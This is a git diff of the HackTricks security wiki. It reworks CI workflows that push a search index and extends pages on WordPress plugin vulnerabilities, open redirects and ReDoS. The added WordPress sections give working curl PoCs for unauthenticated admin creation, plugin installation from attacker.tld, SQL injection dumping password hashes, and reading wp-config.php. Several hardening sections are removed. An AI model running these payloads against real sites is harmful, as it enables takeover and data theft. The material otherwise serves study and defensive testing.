diff --git a/.github/workflows/build_master.yml b/.github/workflows/build_master.yml index 94f5b5b94..f11da8c51 100644 --- a/.github/workflows/build_master.yml +++ b/.github/workflows/build_master.yml @@ -43,7 +43,7 @@ jobs: && sudo apt update \ && sudo apt install gh -y - - name: Publish search index release asset + - name: Push search index to hacktricks-searchindex repo shell: bash env: PAT_TOKEN: ${{ secrets.PAT_TOKEN }} @@ -51,43 +51,99 @@ jobs: set -euo pipefail ASSET="book/searchindex.js" - TAG="searchindex-en" - TITLE="Search Index (en)" + TARGET_REPO="HackTricks-wiki/hacktricks-searchindex" + FILENAME="searchindex-en.js" if [ ! -f "$ASSET" ]; then echo "Expected $ASSET to exist after build" >&2 exit 1 fi - TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}" + TOKEN="${PAT_TOKEN}" if [ -z "$TOKEN" ]; then - echo "No token available for GitHub CLI" >&2 + echo "No PAT_TOKEN available" >&2 exit 1 fi - export GH_TOKEN="$TOKEN" - # Delete the release if it exists - echo "Checking if release $TAG exists..." - if gh release view "$TAG" --repo "$GITHUB_REPOSITORY" >/dev/null 2>&1; then - echo "Release $TAG already exists, deleting it..." - gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag || { - echo "Failed to delete release, trying without cleanup-tag..." - gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" || { - echo "Warning: Could not delete existing release, will try to recreate..." - } - } - sleep 2 # Give GitHub API a moment to process the deletion + # Clone the searchindex repo + git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo + + cd /tmp/searchindex-repo + git config user.name "GitHub Actions" + git config user.email "github-actions@github.com" + + # Compress the searchindex file + cd "${GITHUB_WORKSPACE}" + gzip -9 -k -f "$ASSET" + + # Show compression stats + ORIGINAL_SIZE=$(wc -c < "$ASSET") + COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz") + RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}") + echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)" + + # Copy the .gz version to the searchindex repo + cd /tmp/searchindex-repo + cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz" + + # Stage the updated file + git add "${FILENAME}.gz" + + # Commit and push with retry logic + if git diff --staged --quiet; then + echo "No changes to commit" else - echo "Release $TAG does not exist, proceeding with creation..." + TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC") + git commit -m "Update searchindex files - ${TIMESTAMP}" + + # Retry push up to 20 times with pull --rebase between attempts + MAX_RETRIES=20 + RETRY_COUNT=0 + while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do + if git push origin master; then + echo "Successfully pushed on attempt $((RETRY_COUNT + 1))" + break + else + RETRY_COUNT=$((RETRY_COUNT + 1)) + if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then + echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..." + + # Try normal rebase first + if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then + echo "Rebase successful, retrying push..." + else + # If rebase fails due to divergent histories (orphan branch reset), re-clone + if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then + echo "Detected history rewrite, re-cloning repository..." + cd /tmp + rm -rf searchindex-repo + git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo + cd searchindex-repo + git config user.name "GitHub Actions" + git config user.email "github-actions@github.com" + + # Re-copy the .gz version + cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz" + + git add "${FILENAME}.gz" + TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC") + git commit -m "Update searchindex files - ${TIMESTAMP}" + echo "Re-cloned and re-committed, will retry push..." + else + echo "Rebase failed for unknown reason, retrying anyway..." + fi + fi + + sleep 1 + else + echo "Failed to push after $MAX_RETRIES attempts" + exit 1 + fi + fi + done fi - # Create new release (with force flag to overwrite if deletion failed) - gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY" || { - echo "Failed to create release, trying with force flag..." - gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag >/dev/null 2>&1 || true - sleep 2 - gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY" - } + echo "Successfully pushed searchindex files" # Login in AWs diff --git a/.github/workflows/translate_all.yml b/.github/workflows/translate_all.yml index b0444f9a7..59b1470c3 100644 --- a/.github/workflows/translate_all.yml +++ b/.github/workflows/translate_all.yml @@ -129,7 +129,7 @@ jobs: git pull MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1) - - name: Publish search index release asset + - name: Push search index to hacktricks-searchindex repo shell: bash env: PAT_TOKEN: ${{ secrets.PAT_TOKEN }} @@ -137,31 +137,93 @@ jobs: set -euo pipefail ASSET="book/searchindex.js" - TAG="searchindex-${BRANCH}" - TITLE="Search Index (${BRANCH})" + TARGET_REPO="HackTricks-wiki/hacktricks-searchindex" + FILENAME="searchindex-${BRANCH}.js" if [ ! -f "$ASSET" ]; then echo "Expected $ASSET to exist after build" >&2 exit 1 fi - TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}" + TOKEN="${PAT_TOKEN}" if [ -z "$TOKEN" ]; then - echo "No token available for GitHub CLI" >&2 + echo "No PAT_TOKEN available" >&2 exit 1 fi - export GH_TOKEN="$TOKEN" - # Delete the release if it exists - if gh release view "$TAG" >/dev/null 2>&1; then - echo "Release $TAG already exists, deleting it..." - gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" - fi + # Clone the searchindex repo + git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo - # Create new release - gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for $BRANCH" --repo "$GITHUB_REPOSITORY" + # Compress the searchindex file + gzip -9 -k -f "$ASSET" + + # Show compression stats + ORIGINAL_SIZE=$(wc -c < "$ASSET") + COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz") + RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}") + echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)" + + # Copy ONLY the .gz version to the searchindex repo (no uncompressed .js) + cp "${ASSET}.gz" "/tmp/searchindex-repo/${FILENAME}.gz" + + # Commit and push with retry logic + cd /tmp/searchindex-repo + git config user.name "GitHub Actions" + git config user.email "github-actions@github.com" + git add "${FILENAME}.gz" + + if git diff --staged --quiet; then + echo "No changes to commit" + else + git commit -m "Update ${FILENAME} from hacktricks-cloud build" + + # Retry push up to 20 times with pull --rebase between attempts + MAX_RETRIES=20 + RETRY_COUNT=0 + while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do + if git push origin master; then + echo "Successfully pushed on attempt $((RETRY_COUNT + 1))" + break + else + RETRY_COUNT=$((RETRY_COUNT + 1)) + if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then + echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..." + + # Try normal rebase first + if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then + echo "Rebase successful, retrying push..." + else + # If rebase fails due to divergent histories (orphan branch reset), re-clone + if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then + echo "Detected history rewrite, re-cloning repository..." + cd /tmp + rm -rf searchindex-repo + git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo + cd searchindex-repo + git config user.name "GitHub Actions" + git config user.email "github-actions@github.com" + + # Re-copy ONLY the .gz version (no uncompressed .js) + cp "${ASSET}.gz" "${FILENAME}.gz" + + git add "${FILENAME}.gz" + git commit -m "Update ${FILENAME}.gz from hacktricks-cloud build" + echo "Re-cloned and re-committed, will retry push..." + else + echo "Rebase failed for unknown reason, retrying anyway..." + fi + fi + + sleep 1 + else + echo "Failed to push after $MAX_RETRIES attempts" + exit 1 + fi + fi + done + fi - # Login in AWs + # Login in AWS - name: Configure AWS credentials using OIDC uses: aws-actions/configure-aws-credentials@v3 with: diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md index 7eea42ba0..cf9b546a2 100644 --- a/src/network-services-pentesting/pentesting-web/wordpress.md +++ b/src/network-services-pentesting/pentesting-web/wordpress.md @@ -447,15 +447,6 @@ Detection checklist - Review REST registrations for privileged callbacks that lack robust `permission_callback` checks and instead rely on request headers. - Look for usages of core user-management functions (`wp_insert_user`, `wp_create_user`) inside REST handlers that are gated only by header values. -Hardening - -- Never derive authentication or authorization from client-controlled headers. -- If a reverse proxy must inject identity, terminate trust at the proxy and strip inbound copies (e.g., `unset X-Wcpay-Platform-Checkout-User` at the edge), then pass a signed token and verify it server-side. -- For REST routes performing privileged actions, require `current_user_can()` checks and a strict `permission_callback` (do NOT use `__return_true`). -- Prefer first-party auth (cookies, application passwords, OAuth) over header β€œimpersonation”. - -References: see the links at the end of this page for a public case and broader analysis. - ### Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0) WordPress themes and plugins frequently expose AJAX handlers through the `wp_ajax_` and `wp_ajax_nopriv_` hooks. When the **_nopriv_** variant is used **the callback becomes reachable by unauthenticated visitors**, so any sensitive action must additionally implement: @@ -511,31 +502,6 @@ Other impactful targets include plugin/theme `.php` files (to break security plu * Concatenation of unsanitised user input into paths (look for `$_POST`, `$_GET`, `$_REQUEST`). * Absence of `check_ajax_referer()` and `current_user_can()`/`is_user_logged_in()`. -#### Hardening - -```php -function secure_remove_font_family() { - if ( ! is_user_logged_in() ) { - wp_send_json_error( 'forbidden', 403 ); - } - check_ajax_referer( 'litho_fonts_nonce' ); - - $fontfamily = sanitize_file_name( wp_unslash( $_POST['fontfamily'] ?? '' ) ); - $srcdir = trailingslashit( wp_upload_dir()['basedir'] ) . 'litho-fonts/' . $fontfamily; - - if ( ! str_starts_with( realpath( $srcdir ), realpath( wp_upload_dir()['basedir'] ) ) ) { - wp_send_json_error( 'invalid path', 400 ); - } - // … proceed … -} -add_action( 'wp_ajax_litho_remove_font_family_action_data', 'secure_remove_font_family' ); -// πŸ”’ NO wp_ajax_nopriv_ registration -``` - -> [!TIP] -> **Always** treat any write/delete operation on disk as privileged and double-check: -> β€’ Authentication β€’ Authorisation β€’ Nonce β€’ Input sanitisation β€’ Path containment (e.g. via `realpath()` plus `str_starts_with()`). - --- ### Privilege escalation via stale role restoration and missing authorization (ASE "View Admin as Role") @@ -565,12 +531,6 @@ Why it’s exploitable - If a user previously had higher privileges saved in `_asenha_view_admin_as_original_roles` and was downgraded, they can restore them by hitting the reset path. - In some deployments, any authenticated user could trigger a reset for another username still present in `viewing_admin_as_role_are` (broken authorization). -Attack prerequisites - -- Vulnerable plugin version with the feature enabled. -- Target account has a stale high-privilege role stored in user meta from earlier use. -- Any authenticated session; missing nonce/capability on the reset flow. - Exploitation (example) ```bash @@ -591,21 +551,6 @@ Detection checklist - Modify roles via `add_role()` / `remove_role()` without `current_user_can()` and `wp_verify_nonce()` / `check_admin_referer()`. - Authorize based on a plugin option array (e.g., `viewing_admin_as_role_are`) instead of the actor’s capabilities. -Hardening - -- Enforce capability checks on every state-changing branch (e.g., `current_user_can('manage_options')` or stricter). -- Require nonces for all role/permission mutations and verify them: `check_admin_referer()` / `wp_verify_nonce()`. -- Never trust request-supplied usernames; resolve the target user server-side based on the authenticated actor and explicit policy. -- Invalidate β€œoriginal roles” state on profile/role updates to avoid stale high-privilege restoration: - -```php -add_action( 'profile_update', function( $user_id ) { - delete_user_meta( $user_id, '_asenha_view_admin_as_original_roles' ); -}, 10, 1 ); -``` - -- Consider storing minimal state and using time-limited, capability-guarded tokens for temporary role switches. - --- ### Unauthenticated privilege escalation via cookie‑trusted user switching on public init (Service Finder β€œsf-booking”) @@ -852,6 +797,123 @@ Patched behaviour (Jobmonster 4.8.0) - Removed the insecure fallback from $_POST['id']; $user_email must originate from verified provider branches in switch($_POST['using']). +## Unauthenticated privilege escalation via REST token/key minting on predictable identity (OttoKit/SureTriggers ≀ 1.0.82) + +Some plugins expose REST endpoints that mint reusable β€œconnection keys” or tokens without verifying the caller’s capabilities. If the route authenticates only on a guessable attribute (e.g., username) and does not bind the key to a user/session with capability checks, any unauthenticated attacker can mint a key and invoke privileged actions (admin account creation, plugin actions β†’ RCE). + +- Vulnerable route (example): sure-triggers/v1/connection/create-wp-connection +- Flaw: accepts a username, issues a connection key without current_user_can() or a strict permission_callback +- Impact: full takeover by chaining the minted key to internal privileged actions + +PoC – mint a connection key and use it + +```bash +# 1) Obtain key (unauthenticated). Exact payload varies per plugin +curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/connection/create-wp-connection" \ + -H 'Content-Type: application/json' \ + --data '{"username":"admin"}' +# β†’ {"key":"", ...} + +# 2) Call privileged plugin action using the minted key (namespace/route vary per plugin) +curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/users" \ + -H 'Content-Type: application/json' \ + -H 'X-Connection-Key: ' \ + --data '{"username":"pwn","email":"p@t.ld","password":"p@ss","role":"administrator"}' +``` + +Why it’s exploitable +- Sensitive REST route protected only by low-entropy identity proof (username) or missing permission_callback +- No capability enforcement; minted key is accepted as a universal bypass + +Detection checklist +- Grep plugin code for register_rest_route(..., [ 'permission_callback' => '__return_true' ]) +- Any route that issues tokens/keys based on request-supplied identity (username/email) without tying to an authenticated user or capability +- Look for subsequent routes that accept the minted token/key without server-side capability checks + +Hardening +- For any privileged REST route: require permission_callback that enforces current_user_can() for the required capability +- Do not mint long-lived keys from client-supplied identity; if needed, issue short-lived, user-bound tokens post-authentication and recheck capabilities on use +- Validate the caller’s user context (wp_set_current_user is not sufficient alone) and reject requests where !is_user_logged_in() || !current_user_can() + +--- + +## Nonce gate misuse β†’ unauthenticated arbitrary plugin installation (FunnelKit Automations ≀ 3.5.3) + +Nonces prevent CSRF, not authorization. If code treats a nonce pass as a green light and then skips capability checks for privileged operations (e.g., install/activate plugins), unauthenticated attackers can meet a weak nonce requirement and reach RCE by installing a backdoored or vulnerable plugin. + +- Vulnerable path: plugin/install_and_activate +- Flaw: weak nonce hash check; no current_user_can('install_plugins'|'activate_plugins') once nonce β€œpasses” +- Impact: full compromise via arbitrary plugin install/activation + +PoC (shape depends on plugin; illustrative only) + +```bash +curl -i -s -X POST https://victim.tld/wp-json//plugin/install_and_activate \ + -H 'Content-Type: application/json' \ + --data '{"_nonce":"","slug":"hello-dolly","source":"https://attacker.tld/mal.zip"}' +``` + +Detection checklist +- REST/AJAX handlers that modify plugins/themes with only wp_verify_nonce()/check_admin_referer() and no capability check +- Any code path that sets $skip_caps = true after nonce validation + +Hardening +- Always treat nonces as CSRF tokens only; enforce capability checks regardless of nonce state +- Require current_user_can('install_plugins') and current_user_can('activate_plugins') before reaching installer code +- Reject unauthenticated access; avoid exposing nopriv AJAX actions for privileged flows + +--- + +## Unauthenticated SQLi via s search parameter in depicter-* actions (Depicter Slider ≀ 3.6.1) + +Multiple depicter-* actions consumed the s (search) parameter and concatenated it into SQL queries without parameterization. + +- Parameter: s (search) +- Flaw: direct string concatenation in WHERE/LIKE clauses; no prepared statements/sanitization +- Impact: database exfiltration (users, hashes), lateral movement + +PoC + +```bash +# Replace action with the affected depicter-* handler on the target +curl -G "https://victim.tld/wp-admin/admin-ajax.php" \ + --data-urlencode 'action=depicter_search' \ + --data-urlencode "s=' UNION SELECT user_login,user_pass FROM wp_users-- -" +``` + +Detection checklist +- Grep for depicter-* action handlers and direct use of $_GET['s'] or $_POST['s'] in SQL +- Review custom queries passed to $wpdb->get_results()/query() concatenating s + +Hardening +- Always use $wpdb->prepare() or wpdb placeholders; reject unexpected metacharacters server-side +- Add a strict allowlist for s and normalize to expected charset/length + +--- + +## Unauthenticated Local File Inclusion via unvalidated template/file path (Kubio AI Page Builder ≀ 2.5.1) + +Accepting attacker-controlled paths in a template parameter without normalization/containment allows reading arbitrary local files, and sometimes code execution if includable PHP/log files are pulled into runtime. + +- Parameter: __kubio-site-edit-iframe-classic-template +- Flaw: no normalization/allowlisting; traversal permitted +- Impact: secret disclosure (wp-config.php), potential RCE in specific environments (log poisoning, includable PHP) + +PoC – read wp-config.php + +```bash +curl -i "https://victim.tld/?__kubio-site-edit-iframe-classic-template=../../../../wp-config.php" +``` + +Detection checklist +- Any handler concatenating request paths into include()/require()/read sinks without realpath() containment +- Look for traversal patterns (../) reaching outside the intended templates directory + +Hardening +- Enforce allowlisted templates; resolve with realpath() and require str_starts_with(realpath(file), realpath(allowed_base)) +- Normalize input; reject traversal sequences and absolute paths; use sanitize_file_name() only for filenames (not full paths) + + ## References - [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/) @@ -863,7 +925,11 @@ Patched behaviour (Jobmonster 4.8.0) - [Hackers exploiting critical WordPress WooCommerce Payments bug](https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/) - [Unpatched Privilege Escalation in Service Finder Bookings Plugin](https://patchstack.com/articles/unpatched-privilege-escalation-in-service-finder-bookings-plugin/) - [Service Finder Bookings privilege escalation – Patchstack DB entry](https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-booking-6-0-privilege-escalation-vulnerability) - - [Unauthenticated Broken Authentication Vulnerability in WordPress Jobmonster Theme](https://patchstack.com/articles/unauthenticated-broken-authentication-vulnerability-in-wordpress-jobmonster-theme/) +- [Q3 2025’s most exploited WordPress vulnerabilities and how RapidMitigate blocked them](https://patchstack.com/articles/q3-2025s-most-exploited-wordpress-vulnerabilities-and-how-patchstacks-rapidmitigate-blocked-them/) +- [OttoKit (SureTriggers) ≀ 1.0.82 – Privilege Escalation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability) +- [FunnelKit Automations ≀ 3.5.3 – Unauthenticated arbitrary plugin installation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/wp-marketing-automations/vulnerability/wordpress-recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-plugin-3-5-3-missing-authorization-to-unauthenticated-arbitrary-plugin-installation-vulnerability) +- [Depicter Slider ≀ 3.6.1 – Unauthenticated SQLi via s parameter (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/depicter/vulnerability/wordpress-depicter-slider-plugin-3-6-1-unauthenticated-sql-injection-via-s-parameter-vulnerability) +- [Kubio AI Page Builder ≀ 2.5.1 – Unauthenticated LFI (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/kubio/vulnerability/wordpress-kubio-ai-page-builder-plugin-2-5-1-unauthenticated-local-file-inclusion-vulnerability) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/open-redirect.md b/src/pentesting-web/open-redirect.md index 2cbc9d4e6..c97bf611c 100644 --- a/src/pentesting-web/open-redirect.md +++ b/src/pentesting-web/open-redirect.md @@ -7,12 +7,23 @@ ### Redirect to localhost or arbitrary domains +- If the app β€œallows only internal/whitelisted hosts”, try alternative host notations to hit loopback or internal ranges via the redirect target: + - IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal) + - IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1] + - Trailing dot and casing: localhost., LOCALHOST, 127.0.0.1. + - Wildcard DNS that resolves to loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. These are useful when only β€œsubdomains of X” are allowed but host resolution still points to 127.0.0.1. +- Network-path references often bypass naive validators that prepend a scheme or only check prefixes: + - //attacker.tld β†’ interpreted as scheme-relative and navigates off-site with the current scheme. +- Userinfo tricks defeat contains/startswith checks against trusted hosts: + - https://trusted.tld@attacker.tld/ β†’ browser navigates to attacker.tld but simple string checks β€œsee” trusted.tld. +- Backslash parsing confusion between frameworks/browsers: + - https://trusted.tld\@attacker.tld β†’ some backends treat β€œ\” as a path char and pass validation; browsers normalize to β€œ/” and interpret trusted.tld as userinfo, sending users to attacker.tld. This also appears in Node/PHP URL-parser mismatches. {{#ref}} ssrf-server-side-request-forgery/url-format-bypass.md {{#endref}} -### Open Redirect to XSS +### Modern open-redirect to XSS pivots ```bash #Basic payload, javascript code is executed after "javascript:" @@ -60,6 +71,34 @@ javascript://whitelisted.com?%a0alert%281%29 ";alert(0);// ``` +
+More modern URL-based bypass payloads + +```text +# Scheme-relative (current scheme is reused) +//evil.example + +# Credentials (userinfo) trick +https://trusted.example@evil.example/ + +# Backslash confusion (server validates, browser normalizes) +https://trusted.example\@evil.example/ + +# Schemeless with whitespace/control chars +evil.example%00 +%09//evil.example + +# Prefix/suffix matching flaws +https://trusted.example.evil.example/ +https://evil.example/trusted.example + +# When only path is accepted, try breaking absolute URL detection +/\\evil.example +/..//evil.example +``` +``` +
+ ## Open Redirect uploading svg files ```html @@ -173,18 +212,78 @@ exit; ?> ``` +## Hunting and exploitation workflow (practical) + +- Single URL check with curl: + +```bash +curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:" +``` + +- Discover and fuzz likely parameters at scale: + +
+Click to expand + +```bash +# 1) Gather historical URLs, keep those with common redirect params +cat domains.txt \ + | gau --o urls.txt # or: waybackurls / katana / hakrawler + +# 2) Grep common parameters and normalize list +rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \ + | sed 's/\r$//' | sort -u > candidates.txt + +# 3) Use OpenRedireX to fuzz with payload corpus +cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt + +# 4) Manually verify interesting hits +awk '/30[1237]|Location:/I' results.txt +``` +``` +
+ +- Don’t forget client-side sinks in SPAs: look for window.location/assign/replace and framework helpers that read query/hash and redirect. + +- Frameworks often introduce footguns when redirect destinations are derived from untrusted input (query params, Referer, cookies). See Next.js notes about redirects and avoid dynamic destinations derived from user input. + +{{#ref}} +../network-services-pentesting/pentesting-web/nextjs.md +{{#endref}} + +- OAuth/OIDC flows: abusing open redirectors frequently escalates to account takeover by leaking authorization codes/tokens. See dedicated guide: + +{{#ref}} +./oauth-to-account-takeover.md +{{#endref}} + +- Server responses that implement redirects without Location (meta refresh/JavaScript) are still exploitable for phishing and can sometimes be chained. Grep for: + +```html + + +``` + ## Tools - [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer) +- OpenRedireX – fuzzer for detecting open redirects. Example: -## Resources +```bash +# Install +git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh -- In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) you can find fuzzing lists. +# Fuzz a list of candidate URLs (use FUZZ as placeholder) +cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50 +``` + +## References + +- In https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect you can find fuzzing lists. - [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html) - [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) - [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a) - +- PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection +- OpenRedireX – A fuzzer for detecting open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX {{#include ../banners/hacktricks-training.md}} - - diff --git a/src/pentesting-web/regular-expression-denial-of-service-redos.md b/src/pentesting-web/regular-expression-denial-of-service-redos.md index 21675cc90..15bccf507 100644 --- a/src/pentesting-web/regular-expression-denial-of-service-redos.md +++ b/src/pentesting-web/regular-expression-denial-of-service-redos.md @@ -8,7 +8,12 @@ A **Regular Expression Denial of Service (ReDoS)** happens when someone takes ad ## The Problematic Regex NaΓ―ve Algorithm -**Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)** +**Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)** + +### Engine behavior and exploitability + +- Most popular engines (PCRE, Java `java.util.regex`, Python `re`, JavaScript `RegExp`) use a **backtracking** VM. Crafted inputs that create many overlapping ways to match a subpattern force exponential or high-polynomial backtracking. +- Some engines/libraries are designed to be **ReDoS-resilient** by construction (no backtracking), e.g. **RE2** and ports based on finite automata that provide worst‑case linear time; using them for untrusted input removes the backtracking DoS primitive. See the references at the end for details. ## Evil Regexes @@ -18,10 +23,36 @@ An evil regular expression pattern is that one that can **get stuck on crafted i - ([a-zA-Z]+)\* - (a|aa)+ - (a|a?)+ -- (.\*a){x} for x > 10 +- (.*a){x} for x > 10 All those are vulnerable to the input `aaaaaaaaaaaaaaaaaaaaaaaa!`. +### Practical recipe to build PoCs + +Most catastrophic cases follow this shape: + +- Prefix that gets you into the vulnerable subpattern (optional). +- Long run of a character that causes ambiguous matches inside nested/overlapping quantifiers (e.g., many `a`, `_`, or spaces). +- A final character that forces overall failure so the engine must backtrack through all possibilities (often a character that won’t match the last token, like `!`). + +Minimal examples: + +- `(a+)+$` vs input `"a"*N + "!"` +- `\w*_*\w*$` vs input `"v" + "_"*N + "!"` + +Increase N and observe super‑linear growth. + +#### Quick timing harness (Python) + +```python +import re, time +pat = re.compile(r'(\w*_)\w*$') +for n in [2**k for k in range(8, 15)]: + s = 'v' + '_'*n + '!' + t0=time.time(); pat.search(s); dt=time.time()-t0 + print(n, f"{dt:.3f}s") +``` + ## ReDoS Payloads ### String Exfiltration via ReDoS @@ -30,7 +61,7 @@ In a CTF (or bug bounty) maybe you **control the Regex a sensitive information ( - In [**this post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) you can find this ReDoS rule: `^(?=)((.*)*)*salt$` - Example: `^(?=HTB{sOmE_flΒ§NΒ§)((.*)*)*salt$` -- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`(((((((.*)*)*)*)*)*)*)!` +- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`(((((((.*)*)*)*)*)*)*)!` - In [**this writeup**](https://ctftime.org/writeup/25869) he used: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$` ### ReDoS Controlling Input and Regex @@ -67,19 +98,35 @@ Regexp (a+)*$ took 723 milliseconds. */ ``` +### Language/engine notes for attackers + +- JavaScript (browser/Node): Built‑in `RegExp` is a backtracking engine and commonly exploitable when regex+input are attacker‑influenced. +- Python: `re` is backtracking. Long ambiguous runs plus a failing tail often yield catastrophic backtracking. +- Java: `java.util.regex` is backtracking. If you only control input, look for endpoints using complex validators; if you control patterns (e.g., stored rules), ReDoS is usually trivial. +- Engines such as **RE2/RE2J/RE2JS** or the **Rust regex** crate are designed to avoid catastrophic backtracking. If you hit these, focus on other bottlenecks (e.g., enormous patterns) or find components still using backtracking engines. + ## Tools - [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit) + - Find vulnerable regexes and auto‑generate evil inputs. Examples: + - `pip install regexploit` + - Analyze one pattern interactively: `regexploit` + - Scan Python/JS code for regexes: `regexploit-py path/` and `regexploit-js path/` - [https://devina.io/redos-checker](https://devina.io/redos-checker) +- [https://github.com/davisjam/vuln-regex-detector](https://github.com/davisjam/vuln-regex-detector) + - End‑to‑end pipeline to extract regexes from a project, detect vulnerable ones, and validate PoCs in the target language. Useful for hunting through large codebases. +- [https://github.com/tjenkinson/redos-detector](https://github.com/tjenkinson/redos-detector) + - Simple CLI/JS library that reasons about backtracking to report if a pattern is safe. + +> Tip: When you only control input, generate strings with doubling lengths (e.g., 2^k characters) and track latency. Exponential growth strongly indicates a viable ReDoS. ## References -- [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) +- [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) - [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) -- 